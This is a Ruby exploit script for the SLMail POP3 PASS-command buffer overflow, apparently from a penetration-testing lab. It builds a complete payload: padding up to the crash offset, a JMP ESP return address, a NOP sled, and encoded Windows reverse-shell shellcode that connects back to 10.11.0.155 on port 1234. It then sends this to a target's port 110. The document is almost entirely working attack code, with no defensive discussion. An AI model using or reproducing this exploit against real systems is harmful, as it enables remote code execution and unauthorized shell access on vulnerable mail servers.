#!/usr/bin/env ruby

=begin
        takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL.
        uses windows/shell_reverse_tcp payload
                connects to 10.11.0.155:1234
        encoded with 1 pass of x86/shitaka_ga_nai
=end

require 'socket'

#bad chars = "\x00\x0a\x0d"
#jmp esp address = 5F4A358F

#create padding to crash the program
buffer = "A" * 2606

#create eip register value
eip = "\x8f\x35\x4a\x5f"

#create encoder buffer
encoder_buffer = "\x90" * 16

#create shellcode
shellcode = "\xba\xd1\x38\xf2\x36\xda\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"+
"\x52\x31\x56\x12\x83\xee\xfc\x03\x87\x36\x10\xc3\xdb\xaf\x56"+
"\x2c\x23\x30\x37\xa4\xc6\x01\x77\xd2\x83\x32\x47\x90\xc1\xbe"+
"\x2c\xf4\xf1\x35\x40\xd1\xf6\xfe\xef\x07\x39\xfe\x5c\x7b\x58"+
"\x7c\x9f\xa8\xba\xbd\x50\xbd\xbb\xfa\x8d\x4c\xe9\x53\xd9\xe3"+
"\x1d\xd7\x97\x3f\x96\xab\x36\x38\x4b\x7b\x38\x69\xda\xf7\x63"+
"\xa9\xdd\xd4\x1f\xe0\xc5\x39\x25\xba\x7e\x89\xd1\x3d\x56\xc3"+
"\x1a\x91\x97\xeb\xe8\xeb\xd0\xcc\x12\x9e\x28\x2f\xae\x99\xef"+
"\x4d\x74\x2f\xeb\xf6\xff\x97\xd7\x07\xd3\x4e\x9c\x04\x98\x05"+
"\xfa\x08\x1f\xc9\x71\x34\x94\xec\x55\xbc\xee\xca\x71\xe4\xb5"+
"\x73\x20\x40\x1b\x8b\x32\x2b\xc4\x29\x39\xc6\x11\x40\x60\x8f"+
"\xd6\x69\x9a\x4f\x71\xf9\xe9\x7d\xde\x51\x65\xce\x97\x7f\x72"+
"\x31\x82\x38\xec\xcc\x2d\x39\x25\x0b\x79\x69\x5d\xba\x02\xe2"+
"\x9d\x43\xd7\xa5\xcd\xeb\x88\x05\xbd\x4b\x79\xee\xd7\x43\xa6"+
"\x0e\xd8\x89\xcf\xa5\x23\x5a\xfa\x32\x2b\x01\x92\x46\x2b\x31"+
"\xb1\xce\xcd\x53\x25\x87\x46\xcc\xdc\x82\x1c\x6d\x20\x19\x59"+
"\xad\xaa\xae\x9e\x60\x5b\xda\x8c\x15\xab\x91\xee\xb0\xb4\x0f"+
"\x86\x5f\x26\xd4\x56\x29\x5b\x43\x01\x7e\xad\x9a\xc7\x92\x94"+
"\x34\xf5\x6e\x40\x7e\xbd\xb4\xb1\x81\x3c\x38\x8d\xa5\x2e\x84"+
"\x0e\xe2\x1a\x58\x59\xbc\xf4\x1e\x33\x0e\xae\xc8\xe8\xd8\x26"+
"\x8c\xc2\xda\x30\x91\x0e\xad\xdc\x20\xe7\xe8\xe3\x8d\x6f\xfd"+
"\x9c\xf3\x0f\x02\x77\xb0\x30\xe1\x5d\xcd\xd8\xbc\x34\x6c\x85"+
"\x3e\xe3\xb3\xb0\xbc\x01\x4c\x47\xdc\x60\x49\x03\x5a\x99\x23"+
"\x1c\x0f\x9d\x90\x1d\x1a"

#create padding
padding = "C" * (3500 - 2606 - 4 - 16 - 351)

#assemble payload
payload = buffer + eip + encoder_buffer + shellcode + padding


#send payload
puts "sending payload..."
socket = Socket.tcp("10.11.13.62", 110)
socket.gets.chomp
socket.write("USER test\r\n")
socket.gets.chomp
socket.write("PASS #{payload} \r\n")
socket.write("QUIT\r\n")
socket.close
puts "payload sent... socket closed..."
exit(0)
